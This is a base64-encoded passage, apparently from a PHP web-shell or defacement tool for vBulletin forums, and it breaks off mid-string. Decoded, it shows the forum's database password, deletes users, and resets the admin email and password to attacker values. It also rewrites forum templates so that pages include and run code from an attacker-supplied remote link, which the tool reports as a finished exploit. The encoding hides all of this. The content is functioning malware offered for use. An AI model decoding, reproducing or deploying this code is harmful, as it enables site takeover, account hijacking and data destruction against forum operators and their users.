RoPkhvc3QgOiA8L3RoPjx0aD48PyBlY2hvICc8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRjb25maWdbJ01hc3RlclNlcnZlciddWydzZXJ2ZXJuYW1lJ10gLiAnPC9mb250Pic7ID8+PC90aD4NCjwvdHI+DQo8dHI+DQo8dGg+VXNlciA6IDwvdGg+PHRoPjw/IGVjaG8gJzxmb250IGNvbG9yPXllbGxvdz4nIC4gJGNvbmZpZ1snTWFzdGVyU2VydmVyJ11bJ3VzZXJuYW1lJ10gLiAnPC9mb250Pic7ID8+PC90aD4NCjwvdHI+DQo8dHI+DQo8dGg+UGFzcyA6IDwvdGg+PHRoPjw/DQokcGFzc3NxbCA9ICRjb25maWdbJ01hc3RlclNlcnZlciddWydwYXNzd29yZCddOw0KaWYgKCRwYXNzc3FsID09ICcnKQ0Kew0KJHJlc3VsdCA9ICc8Zm9udCBjb2xvcj1yZWQ+Tm8gUGFzc3dvcmQ8L2ZvbnQ+JzsNCn0gZWxzZSB7DQokcmVzdWx0ID0gJzxmb250IGNvbG9yPXllbGxvdz4nIC4gJHBhc3NzcWwgLiAnPC9mb250Pic7DQp9DQplY2hvICRyZXN1bHQ7ID8+PC90aD4NCjwvdHI+DQo8dHI+DQo8dGg+TmFtZSA6IDwvdGg+PHRoPjw/IGVjaG8gJzxmb250IGNvbG9yPXllbGxvdz4nIC4gJGNvbmZpZ1snRGF0YWJhc2UnXVsnZGJuYW1lJ10gLiAnPC9mb250Pic7ID8+PC90aD4NCjwvdHI+DQo8L3RhYmxlPg0KPD8NCn0NCmlmKGlzc2V0KCRfUE9TVFsnaG9zdCddKSAmJiBpc3NldCgkX1BPU1RbJ3VzZXInXSkgJiYgaXNzZXQoJF9QT1NUWydwYXNzJ10pICYmIGlzc2V0KCRfUE9TVFsnZGInXSkgJiYgJGFjdD09ImRlbCIgICYmIGlzc2V0KCRfUE9TVFsndmJ1c2VyJ10pICkNCnsNCiAkaG9zdCA9ICRfUE9TVFsnaG9zdCddOw0KJHVzZXIgPSAkX1BPU1RbJ3VzZXInXTsNCiRwYXNzID0gJF9QT1NUWydwYXNzJ107DQokZGIgPSAkX1BPU1RbJ2RiJ107DQokdmJ1c2VyID0gJF9QT1NUWyd2YnVzZXInXTsNCm15c3FsX2Nvbm5lY3QoJGhvc3QsJHVzZXIsJHBhc3MpIG9yIGRpZSgnPGZvbnQgY29sb3I9cmVkPk5vcGUsPC9mb250Pjxmb250IGNvbG9yPXllbGxvdz5ObyBjT25uZWN0aW9uIHdpdGggdXNlcjwvZm9udD4nKTsNCm15c3FsX3NlbGVjdF9kYigkZGIpIG9yIGRpZSgnPGZvbnQgY29sb3I9cmVkPk5vcGUsPC9mb250Pjxmb250IGNvbG9yPXllbGxvdz5ObyBjT25uZWN0aW9uIHdpdGggREI8L2ZvbnQ+Jyk7DQppZiAoJHBhc3MgPT0gJycpDQp7DQokbnBhc3MgPSAnTlVMTCc7DQp9IGVsc2Ugew0KJG5wYXNzID0gJHBhc3M7DQp9DQplY2hvJzxmb250IHNpemU9Mz5Zb3UgYXJlIGNvbm5lY3RlZCB3aXRoIHRoZSBteXNxbCBzZXJ2ZXIgb2YgPGZvbnQgY29sb3I9eWVsbG93PicgLiAkaG9zdCAuICc8L2ZvbnQ+IGJ5IHVzZXIgOiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICR1c2VyIC4gJzwvZm9udD4gLCBwYXNzIDogPGZvbnQgY29sb3I9eWVsbG93PicgLiAkbnBhc3MgLiAnPC9mb250PiBhbmQgc2VsZWN0ZWQgREIgd2l0aCB0aGUgbmFtZSA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRkYiAuICc8L2ZvbnQ+PC9mb250Pic7DQo/Pg0KPGhyIGNvbG9yPSIjMDBGRjAwIiAvPg0KPD8NCiRxdWVyeSA9ICdkZWxldGUgKiBmcm9tIHVzZXIgd2hlcmUgdXNlcm5hbWU9IicgLiAkdmJ1c2VyIC4gJyI7JzsNCiRyID0gbXlzcWxfcXVlcnkoJHF1ZXJ5KTsNCmlmICgkcikNCnsNCmVjaG8gJzxmb250IGNvbG9yPXllbGxvdz5Vc2VyIDogJyAuICR2YnVzZXIgLiAnIHdhcyBkZWxldGVkPC9mb250Pic7DQp9IGVsc2Ugew0KZWNobyAnPGZvbnQgY29sb3I9cmVkPlVzZXIgOiAnIC4gJHZidXNlciAuICcgY291bGQgbm90IGJlIGRlbGV0ZWQ8L2ZvbnQ+JzsNCn0NCn0NCmlmKGlzc2V0KCRfUE9TVFsnaG9zdCddKSAmJiBpc3NldCgkX1BPU1RbJ3VzZXInXSkgJiYgaXNzZXQoJF9QT1NUWydwYXNzJ10pICYmIGlzc2V0KCRfUE9TVFsnZGInXSkgJiYgJGFjdD09InNoZWxsIiAgJiYgaXNzZXQoJF9QT1NUWyd2YXInXSkpDQp7DQokaG9zdCA9ICRfUE9TVFsnaG9zdCddOw0KJHVzZXIgPSAkX1BPU1RbJ3VzZXInXTsNCiRwYXNzID0gJF9QT1NUWydwYXNzJ107DQokZGIgPSAkX1BPU1RbJ2RiJ107DQokdmFyID0gJF9QT1NUWyd2YXInXTsNCm15c3FsX2Nvbm5lY3QoJGhvc3QsJHVzZXIsJHBhc3MpIG9yIGRpZSgnPGZvbnQgY29sb3I9cmVkPk5vcGUsPC9mb250Pjxmb250IGNvbG9yPXllbGxvdz5ObyBjT25uZWN0aW9uIHdpdGggdXNlcjwvZm9udD4nKTsNCm15c3FsX3NlbGVjdF9kYigkZGIpIG9yIGRpZSgnPGZvbnQgY29sb3I9cmVkPk5vcGUsPC9mb250Pjxmb250IGNvbG9yPXllbGxvdz5ObyBjT25uZWN0aW9uIHdpdGggREI8L2ZvbnQ+Jyk7DQppZiAoJHBhc3MgPT0gJycpDQp7DQokbnBhc3MgPSAnTlVMTCc7DQp9IGVsc2Ugew0KJG5wYXNzID0gJHBhc3M7DQp9DQplY2hvJzxmb250IHNpemU9Mz5Zb3UgYXJlIGNvbm5lY3RlZCB3aXRoIHRoZSBteXNxbCBzZXJ2ZXIgb2YgPGZvbnQgY29sb3I9eWVsbG93PicgLiAkaG9zdCAuICc8L2ZvbnQ+IGJ5IHVzZXIgOiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICR1c2VyIC4gJzwvZm9udD4gLCBwYXNzIDogPGZvbnQgY29sb3I9eWVsbG93PicgLiAkbnBhc3MgLiAnPC9mb250PiBhbmQgc2VsZWN0ZWQgREIgd2l0aCB0aGUgbmFtZSA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRkYiAuICc8L2ZvbnQ+PC9mb250Pic7DQo/Pg0KPGhyIGNvbG9yPSIjMDBGRjAwIiAvPg0KPD8NCiRXZHQgPSAnVVBEQVRFIGB0ZW1wbGF0ZWAgU0VUIGB0ZW1wbGF0ZWAgPSBcJyAiLnByaW50IGluY2x1ZGUoJEhUVFBfR0VUX1ZBUlNbJyAuICR2YXIgLiAnXSkuIiBcJ1dIRVJFIGB0aXRsZWAgPVwnRk9SVU1IT01FXCc7JzsNCiRXZHQyPSAnVVBEQVRFIGBzdHlsZWAgU0VUIGBjc3NgID0gXCcgIi5wcmludCBpbmNsdWRlKCRIVFRQX0dFVF9WQVJTWycgLiAkdmFyIC4gJ10pLiIgXCcsIGBzdHlsZXZhcnNgID0gXCdcJywgYGNzc2NvbG9yc2AgPSBcJ1wnLCBgZWRpdG9yc3R5bGVzYCA9IFwnXCcgOyc7DQokcmVzdWx0PW15c3FsX3F1ZXJ5KCRXZHQpOw0KICBpZiAoJHJlc3VsdCkge2VjaG8gIjxwPkRvbmUgRXhwbG9pdC48L3A+PGJyPlVzZSB0aGlzIDogPGJyPiBpbmRleC5waHA/IiAuICR2YXIgLiAiPXNoZWxsLnR4dCI7fWVsc2V7DQplY2hvICI8cD5FcnJvcjwvcD4iO30NCiRyZXN1bHQxPW15c3FsX3F1ZXJ5KCRXZHQyKTsNCiAgaWYgKCRyZXN1bHQxKSB7IGVjaG8gIjxwPkRvbmUgQ3JlYXRlIEZpbGU8L3A+PGJyPlVzZSB0aGlzIDogPGJyPiBpbmRleC5waHA/IiAuICR2YXIgLiAiPXNoZWxsLnR4dCI7fSBlbHNleyBlY2hvICI8cD5FcnJvcjwvcD4iO30NCn0NCmlmKGlzc2V0KCRfUE9TVFsnaG9zdCddKSAmJiBpc3NldCgkX1BPU1RbJ3VzZXInXSkgJiYgaXNzZXQoJF9QT1NUWydwYXNzJ10pICYmIGlzc2V0KCRfUE9TVFsnZGInXSkgJiYgJGFjdD09ImNvZGUiICAmJiBpc3NldCgkX1BPU1RbJ2NvZGUnXSkpDQp7DQokaG9zdCA9ICRfUE9TVFsnaG9zdCddOw0KJHVzZXIgPSAkX1BPU1RbJ3VzZXInXTsNCiRwYXNzID0gJF9QT1NUWydwYXNzJ107DQokZGIgPSAkX1BPU1RbJ2RiJ107DQokaW5kZXggPSAkX1BPU1RbJ2NvZGUnXTsNCm15c3FsX2Nvbm5lY3QoJGhvc3QsJHVzZXIsJHBhc3MpIG9yIGRpZSgnPGZvbnQgY29sb3I9cmVkPk5vcGUsPC9mb250Pjxmb250IGNvbG9yPXllbGxvdz5ObyBjT25uZWN0aW9uIHdpdGggdXNlcjwvZm9udD4nKTsNCm15c3FsX3NlbGVjdF9kYigkZGIpIG9yIGRpZSgnPGZvbnQgY29sb3I9cmVkPk5vcGUsPC9mb250Pjxmb250IGNvbG9yPXllbGxvdz5ObyBjT25uZWN0aW9uIHdpdGggREI8L2ZvbnQ+Jyk7DQppZiAoJHBhc3MgPT0gJycpDQp7DQokbnBhc3MgPSAnTlVMTCc7DQp9IGVsc2Ugew0KJG5wYXNzID0gJHBhc3M7DQp9DQplY2hvJzxmb250IHNpemU9Mz5Zb3UgYXJlIGNvbm5lY3RlZCB3aXRoIHRoZSBteXNxbCBzZXJ2ZXIgb2YgPGZvbnQgY29sb3I9eWVsbG93PicgLiAkaG9zdCAuICc8L2ZvbnQ+IGJ5IHVzZXIgOiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICR1c2VyIC4gJzwvZm9udD4gLCBwYXNzIDogPGZvbnQgY29sb3I9eWVsbG93PicgLiAkbnBhc3MgLiAnPC9mb250PiBhbmQgc2VsZWN0ZWQgREIgd2l0aCB0aGUgbmFtZSA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRkYiAuICc8L2ZvbnQ+PC9mb250Pic7DQo/Pg0KPGhyIGNvbG9yPSIjMDBGRjAwIiAvPg0KPD8NCiRpbmRleCA9ICRfUE9TVFsnYiddOw0KJFdkdCA9ICdVUERBVEUgYHRlbXBsYXRlYCBTRVQgYHRlbXBsYXRlYCA9IFwnICcgLiAkaW5kZXggLiAnICBcJ1dIRVJFIGB0aXRsZWAgPVwnRk9SVU1IT01FXCc7JzsNCiRXZHQyPSAnVVBEQVRFIGBzdHlsZWAgU0VUIGBjc3NgID0gXCcgJyAuICRpbmRleCAuICcgXCcsIGBzdHlsZXZhcnNgID0gXCdcJywgYGNzc2NvbG9yc2AgPSBcJ1wnLCBgZWRpdG9yc3R5bGVzYCA9IFwnXCcgOyc7DQokcmVzdWx0PW15c3FsX3F1ZXJ5KCRXZHQpOw0KICBpZiAoJHJlc3VsdCkge2VjaG8gIjxwPkluZGV4IHdhcyBDaGFuZ2VkIFN1Y2NlZnVsbHk8L3A+Ijt9ZWxzZXsNCmVjaG8gIjxwPkZhaWxlZCB0byBjaGFuZ2UgaW5kZXg8L3A+Ijt9DQokcmVzdWx0MT1teXNxbF9xdWVyeSgkV2R0Mik7DQppZiAoJHJlc3VsdDEpIHtlY2hvICI8cD5Eb25lIENyZWF0ZSBGaWxlPC9wPiI7fSBlbHNleyBlY2hvICI8cD5FcnJvcjwvcD4iO30NCn0NCg0KaWYoaXNzZXQoJF9QT1NUWydob3N0J10pICYmIGlzc2V0KCRfUE9TVFsndXNlciddKSAmJiBpc3NldCgkX1BPU1RbJ3Bhc3MnXSkgJiYgaXNzZXQoJF9QT1NUWydkYiddKSAmJiAkYWN0PT0iaW5jIiAgJiYgaXNzZXQoJF9QT1NUWydsaW5rJ10pKQ0Kew0KJGhvc3QgPSAkX1BPU1RbJ2hvc3QnXTsNCiR1c2VyID0gJF9QT1NUWyd1c2VyJ107DQokcGFzcyA9ICRfUE9TVFsncGFzcyddOw0KJGRiID0gJF9QT1NUWydkYiddOw0KJHZibGluayA9ICRfUE9TVFsnbGluayddOw0KbXlzcWxfY29ubmVjdCgkaG9zdCwkdXNlciwkcGFzcykgb3IgZGllKCc8Zm9udCBjb2xvcj1yZWQ+Tm9wZSw8L2ZvbnQ+PGZvbnQgY29sb3I9eWVsbG93Pk5vIGNPbm5lY3Rpb24gd2l0aCB1c2VyPC9mb250PicpOw0KbXlzcWxfc2VsZWN0X2RiKCRkYikgb3IgZGllKCc8Zm9udCBjb2xvcj1yZWQ+Tm9wZSw8L2ZvbnQ+PGZvbnQgY29sb3I9eWVsbG93Pk5vIGNPbm5lY3Rpb24gd2l0aCBEQjwvZm9udD4nKTsNCmlmICgkcGFzcyA9PSAnJykNCnsNCiRucGFzcyA9ICdOVUxMJzsNCn0gZWxzZSB7DQokbnBhc3MgPSAkcGFzczsNCn0NCmVjaG8nPGZvbnQgc2l6ZT0zPllvdSBhcmUgY29ubmVjdGVkIHdpdGggdGhlIG15c3FsIHNlcnZlciBvZiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRob3N0IC4gJzwvZm9udD4gYnkgdXNlciA6IDxmb250IGNvbG9yPXllbGxvdz4nIC4gJHVzZXIgLiAnPC9mb250PiAsIHBhc3MgOiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRucGFzcyAuICc8L2ZvbnQ+IGFuZCBzZWxlY3RlZCBEQiB3aXRoIHRoZSBuYW1lIDxmb250IGNvbG9yPXllbGxvdz4nIC4gJGRiIC4gJzwvZm9udD48L2ZvbnQ+JzsNCj8+DQo8aHIgY29sb3I9IiMwMEZGMDAiIC8+DQo8Pw0KJGhhY2sxNSA9ICdVUERBVEUgYHRlbXBsYXRlYCBTRVQgYHRlbXBsYXRlYCA9IFwnJHNwYWNlcl9vcGVuDQp7JHtpbmNsdWRlKFwnXCcnIC4gJHZibGluayAuICdcJ1wnKX19eyR7ZXhpdCgpfX0mDQokX3BocGluY2x1ZGVfb3V0cHV0XCdXSEVSRSBgdGl0bGVgID1cJ0ZPUlVNSE9NRVwnOyc7DQokaGFjaz0gJ1VQREFURSBgc3R5bGVgIFNFVCBgY3NzYCA9IFwnJHNwYWNlcl9vcGVuDQp7JHtpbmNsdWRlKFwnXCcnIC4gJHZibGluayAuJ1wnXCcpfX17JHtleGl0KCl9fSYNCiRfcGhwaW5jbHVkZV9vdXRwdXRcJywgYHN0eWxldmFyc2AgPSBcJ1wnLCBgY3NzY29sb3JzYCA9IFwnXCcsIGBlZGl0b3JzdHlsZXNgID0gXCdcJyA7JzsNCiRyZXN1bHQ9bXlzcWxfcXVlcnkoJGhhY2sxNSkgb3IgZGllKG15c3FsX2Vycm9yKCkpOw0KJHJlc3VsdD1teXNxbF9xdWVyeSgkaGFjaykgb3IgZGllKG15c3FsX2Vycm9yKCkpOw0KfQ0KaWYoaXNzZXQoJF9QT1NUWydob3N0J10pICYmIGlzc2V0KCRfUE9TVFsndXNlciddKSAmJiBpc3NldCgkX1BPU1RbJ3Bhc3MnXSkgJiYgaXNzZXQoJF9QT1NUWydkYiddKSAmJiAkYWN0PT0ibWFpbCIgICYmIGlzc2V0KCRfUE9TVFsndmJ1c2VyJ10pICAmJiBpc3NldCgkX1BPU1RbJ3ZibWFpbCddKSkNCnsNCiAkaG9zdCA9ICRfUE9TVFsnaG9zdCddOw0KJHVzZXIgPSAkX1BPU1RbJ3VzZXInXTsNCiRwYXNzID0gJF9QT1NUWydwYXNzJ107DQokZGIgPSAkX1BPU1RbJ2RiJ107DQokdmJ1c2VyID0gJF9QT1NUWyd2YnVzZXInXTsNCiR2Ym1haWwgPSAkX1BPU1RbJ3ZibWFpbCddOw0KbXlzcWxfY29ubmVjdCgkaG9zdCwkdXNlciwkcGFzcykgb3IgZGllKCc8Zm9udCBjb2xvcj1yZWQ+Tm9wZSw8L2ZvbnQ+PGZvbnQgY29sb3I9eWVsbG93Pk5vIGNPbm5lY3Rpb24gd2l0aCB1c2VyPC9mb250PicpOw0KbXlzcWxfc2VsZWN0X2RiKCRkYikgb3IgZGllKCc8Zm9udCBjb2xvcj1yZWQ+Tm9wZSw8L2ZvbnQ+PGZvbnQgY29sb3I9eWVsbG93Pk5vIGNPbm5lY3Rpb24gd2l0aCBEQjwvZm9udD4nKTsNCmlmICgkcGFzcyA9PSAnJykNCnsNCiRucGFzcyA9ICdOVUxMJzsNCn0gZWxzZSB7DQokbnBhc3MgPSAkcGFzczsNCn0NCmVjaG8nPGZvbnQgc2l6ZT0zPllvdSBhcmUgY29ubmVjdGVkIHdpdGggdGhlIG15c3FsIHNlcnZlciBvZiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRob3N0IC4gJzwvZm9udD4gYnkgdXNlciA6IDxmb250IGNvbG9yPXllbGxvdz4nIC4gJHVzZXIgLiAnPC9mb250PiAsIHBhc3MgOiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRucGFzcyAuICc8L2ZvbnQ+IGFuZCBzZWxlY3RlZCBEQiB3aXRoIHRoZSBuYW1lIDxmb250IGNvbG9yPXllbGxvdz4nIC4gJGRiIC4gJzwvZm9udD48L2ZvbnQ+JzsNCj8+DQo8aHIgY29sb3I9IiMwMEZGMDAiIC8+DQo8Pw0KJHF1ZXJ5ID0gJ3VwZGF0ZSB1c2VyIHNldCBlbWFpbD0iJyAuICR2Ym1haWwgLiAnIiB3aGVyZSB1c2VybmFtZT0iJyAuICR2YnVzZXIgLiAnIjsnOw0KJHJlID0gbXlzcWxfcXVlcnkoJHF1ZXJ5KTsNCmlmICgkcmUpDQp7DQplY2hvICc8Zm9udCBzaXplPTM+PGZvbnQgY29sb3I9eWVsbG93PlRoZSBFLU1BSUwgb2YgdGhlIHVzZXIgPC9mb250Pjxmb250IGNvbG9yPXJlZD4nIC4gJHZidXNlciAuICc8L2ZvbnQ+PGZvbnQgY29sb3I9eWVsbG93PiB3YXMgY2hhbmdlZCB0byA8L2ZvbnQ+PGZvbnQgY29sb3I9cmVkPicgLiAkdmJtYWlsIC4gJzwvZm9udD48YnI+QmFjayB0byA8YSBocmVmPSI/Ij5TaGVsbDwvYT48L2ZvbnQ+JzsNCn0gZWxzZSB7DQplY2hvICc8Zm9udCBzaXplPTM+PGZvbnQgY29sb3I9cmVkPkZhaWxlZCB0byBjaGFuZ2UgRS1NQUlMPC9mb250PjwvZm9udD4nOw0KfQ0KfQ0KaWYoaXNzZXQoJF9QT1NUWydob3N0J10pICYmIGlzc2V0KCRfUE9TVFsndXNlciddKSAmJiBpc3NldCgkX1BPU1RbJ3Bhc3MnXSkgJiYgaXNzZXQoJF9QT1NUWydkYiddKSAmJiAkYWN0PT0icHN3IiAgJiYgaXNzZXQoJF9QT1NUWyd2YnVzZXInXSkgICYmIGlzc2V0KCRfUE9TVFsndmJwYXNzJ10pKQ0Kew0KJGhvc3QgPSAkX1BPU1RbJ2hvc3QnXTsNCiR1c2VyID0gJF9QT1NUWyd1c2VyJ107DQokcGFzcyA9ICRfUE9TVFsncGFzcyddOw0KJGRiID0gJF9QT1NUWydkYiddOw0KJHZidXNlciA9ICRfUE9TVFsndmJ1c2VyJ107DQokdmJwYXNzID0gJF9QT1NUWyd2YnBhc3MnXTsNCm15c3FsX2Nvbm5lY3QoJGhvc3QsJHVzZXIsJHBhc3MpIG9yIGRpZSgnPGZvbnQgY29sb3I9cmVkPk5vcGUsPC9mb250Pjxmb250IGNvbG9yPXllbGxvdz5ObyBjT25uZWN0aW9uIHdpdGggdXNlcjwvZm9udD4nKTsNCm15c3FsX3NlbGVjdF9kYigkZGIpIG9yIGRpZSgnPGZvbnQgY29sb3I9cmVkPk5vcGUsPC9mb250Pjxmb250IGNvbG9yPXllbGxvdz5ObyBjT25uZWN0aW9uIHdpdGggREI8L2ZvbnQ+Jyk7DQppZiAoJHBhc3MgPT0gJycpDQp7DQokbnBhc3MgPSAnTlVMTCc7DQp9IGVsc2Ugew0KJG5wYXNzID0gJHBhc3M7DQp9DQplY2hvJzxmb250IHNpemU9Mz5Zb3UgYXJlIGNvbm5lY3RlZCB3aXRoIHRoZSBteXNxbCBzZXJ2ZXIgb2YgPGZvbnQgY29sb3I9eWVsbG93PicgLiAkaG9zdCAuICc8L2ZvbnQ+IGJ5IHVzZXIgOiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICR1c2VyIC4gJzwvZm9udD4gLCBwYXNzIDogPGZvbnQgY29sb3I9eWVsbG93PicgLiAkbnBhc3MgLiAnPC9mb250PiBhbmQgc2VsZWN0ZWQgREIgd2l0aCB0aGUgbmFtZSA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRkYiAuICc8L2ZvbnQ+PC9mb250Pic7DQo/Pg0KPGhyIGNvbG9yPSIjMDBGRjAwIiAvPg0KPD8NCiRxdWVyeSA9ICdzZWxlY3QgKiBmcm9tIHVzZXIgd2hlcmUgdXNlcm5hbWU9IicgLiAkdmJ1c2VyIC4gJyI7JzsNCiRyZXN1bHQgPSBteXNxbF9xdWVyeSgkcXVlcnkpOw0Kd2hpbGUgKCRyb3cgPSBteXNxbF9mZXRjaF9hcnJheSgkcmVzdWx0KSkNCnsNCiRzYWx0ID0gJHJvd1snc2FsdCddOw0KJHggPSBtZDUoJHZicGFzcyk7DQokeCA9JHggLiAkc2FsdDsNCiRwYXNzX3NhbHQgPSBtZDUoJHgpOw0KJHF1ZXJ5ID0gJ3VwZGF0ZSB1c2VyIHNldCBwYXNzd29yZD0iJyAuICRwYXNzX3NhbHQgLiAnIiB3aGVyZSB1c2VybmFtZT0iJyAuICR2YnVzZXIgLiAnIjsnOw0KJHJlID0gbXlzcWxfcXVlcnkoJHF1ZXJ5KTsNCmlmICgkcmUpDQp7DQplY2hvICc8Zm9udCBzaXplPTM+PGZvbnQgY29sb3I9eWVsbG93PlRoZSBwYXNzIG9mIHRoZSB1c2VyIDwvZm9udD48Zm9udCBjb2xvcj1yZWQ+JyAuICR2YnVzZXIgLiAnPC9mb250Pjxmb250IGNvbG9yPXllbGxvdz4gd2FzIGNoYW5nZWQgdG8gPC9mb250Pjxmb250IGNvbG9yPXJlZD4nIC4gJHZicGFzcyAuICc8L2ZvbnQ+PGJyPkJhY2sgdG8gPGEgaHJlZj0iPyI+U2hlbGw8L2E+PC9mb250Pic7DQp9IGVsc2Ugew0KZWNobyAnPGZvbnQgc2l6ZT0zPjxmb250IGNvbG9yPXJlZD5GYWlsZWQgdG8gY2hhbmdlIFBhc3NXb3JkPC9mb250PjwvZm9udD4nOw0KfQ0KfQ0KfQ0KaWYoaXNzZXQoJF9QT1NUWydob3N0J10pICYmIGlzc2V0KCRfUE9TVFsndXNlciddKSAmJiBpc3NldCgkX1BPU1RbJ3Bhc3MnXSkgJiYgaXNzZXQoJF9QT1NUWydkYiddKSAmJiAkYWN0PT0ibG9naW4iKQ0Kew0KJGhvc3QgPSAkX1BPU1RbJ2hvc3QnXTsNCiR1c2VyID0gJF9QT1NUWyd1c2VyJ107DQokcGFzcyA9ICRfUE9TVFsncGFzcyddOw0KJGRiID0gJF9QT1NUWydkYiddOw0KbXlzcWxfY29ubmVjdCgkaG9zdCwkdXNlciwkcGFzcykgb3IgZGllKCc8Zm9udCBjb2xvcj1yZWQ+Tm9wZSw8L2ZvbnQ+PGZvbnQgY29sb3I9eWVsbG93Pk5vIGNPbm5lY3Rpb24gd2l0aCB1c2VyPC9mb250PicpOw0KbXlzcWxfc2VsZWN0X2RiKCRkYikgb3IgZGllKCc8Zm9udCBjb2xvcj1yZWQ+Tm9wZSw8L2ZvbnQ+PGZvbnQgY29sb3I9eWVsbG93Pk5vIGNPbm5lY3Rpb24gd2l0aCBEQjwvZm9udD4nKTsNCmlmICgkcGFzcyA9PSAnJykNCnsNCiRucGFzcyA9ICdOVUxMJzsNCn0gZWxzZSB7DQokbnBhc3MgPSAkcGFzczsNCn0NCmVjaG8nPGZvbnQgc2l6ZT0zPllvdSBhcmUgY29ubmVjdGVkIHdpdGggdGhlIG15c3FsIHNlcnZlciBvZiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRob3N0IC4gJzwvZm9udD4gYnkgdXNlciA6IDxmb250IGNvbG9yPXllbGxvdz4nIC4gJHVzZXIgLiAnPC9mb250PiAsIHBhc3MgOiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRucGFzcyAuICc8L2ZvbnQ+IGFuZCBzZWxlY3RlZCBEQiB3aXRoIHRoZSBuYW1lIDxmb250IGNvbG9yPXllbGxvdz4nIC4gJGRiIC4gJzwvZm9udD48L2ZvbnQ+JzsNCj8+DQo8aHIgY29sb3I9IiMwMEZGMDAiIC8+DQo8Zm9ybSBuYW1lPSJjaGFuZ2VwYXNzIiBhY3Rpb249Ij9hY3Q9cHN3IiBtZXRob2Q9InBvc3QiPg0KPHRhYmxlIGJvcmRlcj0iMSIgYmdjb2xvcj0iIzAwMDAwMCIgYm9yZGVyY29sb3I9ImxpbWUiDQpib3JkZXJjb2xvcmRhcms9ImxpbWUiIGJvcmRlcmNvbG9ybGlnaHQ9ImxpbWUiPg0KPHRoPjo6Ojo6Q2hhbmdlIFVzZXIgUGFzc3dvcmQ6Ojo6OjwvdGg+PHRoPjxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IkNoYW5nZSIgdmFsdWU9IkNoYW5nZSIgLz48L3RoPg0KPHRyPjx0ZD5Vc2VyIDogPC90ZD48dGQ+PGlucHV0IG5hbWU9InZidXNlciIgdmFsdWU9ImFkbWluIiAvPjwvdGQ+PC90cj4NCjx0cj48dGQ+UGFzcyA6IDwvdGQ+PHRkPjxpbnB1dCBuYW1lPSJ2YnBhc3MiIHZhbHVlPSJlZ3kgc3BpZGVyIiAvPjwvdGQ+PC90cj4NCjwvdGFibGU+DQo8Pw0KZWNobyc8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJob3N0IiB2YWx1ZT0iJyAuICRob3N0IC4gJyI+PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0idXNlciIgdmFsdWU9IicgLiAkdXNlciAuICciPjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InBhc3MiIHZhbHVlPSInIC4gJHBhc3MgLiAnIj48aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkYiIgdmFsdWU9IicgLiAkZGIgLiAnIj4nOw0KPz4NCjwvZm9ybT4NCjxociBjb2xvcj0iIzAwRkYwMCIgLz4NCjxmb3JtIG5hbWU9ImNoYW5nZXBhc3MiIGFjdGlvbj0iP2FjdD1tYWlsIiBtZXRob2Q9InBvc3QiPg0KPHRhYmxlIGJvcmRlcj0iMSIgYmdjb2xvcj0iIzAwMDAwMCIgYm9yZGVyY29sb3I9ImxpbWUiDQpib3JkZXJjb2xvcmRhcms9ImxpbWUiIGJvcmRlcmNvbG9ybGlnaHQ9ImxpbWUiPg0KPHRoPjo6Ojo6Q2hhbmdlIFVzZXIgRS1NQUlMOjo6Ojo8L3RoPjx0aD48aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJDaGFuZ2UiIHZhbHVlPSJDaGFuZ2UiIC8+PC90aD4NCjx0cj48dGQ+VXNlciA6IDwvdGQ+PHRkPjxpbnB1dCBuYW1lPSJ2YnVzZXIiIHZhbHVlPSJhZG1pbiIgLz48L3RkPjwvdHI+DQo8dHI+PHRkPk1BSUwgOiA8L3RkPjx0ZD48aW5wdXQgbmFtZT0idmJtYWlsIiB2YWx1ZT0iZWd5X3NwaWRlckBob3RtYWlsLmNvbSIgLz48L3RkPjwvdHI+DQo8L3RhYmxlPg0KPD8NCmVjaG8nPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iaG9zdCIgdmFsdWU9IicgLiAkaG9zdCAuICciPjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InVzZXIiIHZhbHVlPSInIC4gJHVzZXIgLiAnIj48aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJwYXNzIiB2YWx1ZT0iJyAuICRwYXNzIC4gJyI+PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZGIiIHZhbHVlPSInIC4gJGRiIC4gJyI+JzsNCj8+DQo8L2Zvcm0+DQo8aHIgY29sb3I9IiMwMEZGMDAiIC8+DQo8Zm9ybSBuYW1lPSJjaGFuZ2VwYXNzIiBhY3Rpb249Ij9hY3Q9ZGVsIiBtZXRob2Q9InBvc3QiPg0KPHRhYmxlIGJvcmRlcj0iMSIgYmdjb2xvcj0iIzAwMDAwMCIgYm9yZGVyY29sb3I9ImxpbWUiDQpib3JkZXJjb2xvcmRhcms9ImxpbWUiIGJvcmRlcmNvbG9ybGlnaHQ9ImxpbWUiPg0KPHRoPjo6Ojo6RGVsZXRlIGEgdXNlcjo6Ojo6PC90aD48dGg+PGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0iQ2hhbmdlIiB2YWx1ZT0iQ2hhbmdlIiAvPjwvdGg+DQo8dHI+PHRkPlVzZXIgOiA8L3RkPjx0ZD48aW5wdXQgbmFtZT0idmJ1c2VyIiB2YWx1ZT0iYWRtaW4iIC8+PC90ZD48L3RyPg0KPC90YWJsZT4NCjw/DQplY2hvJzxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Imhvc3QiIHZhbHVlPSInIC4gJGhvc3QgLiAnIj48aW5wdXQ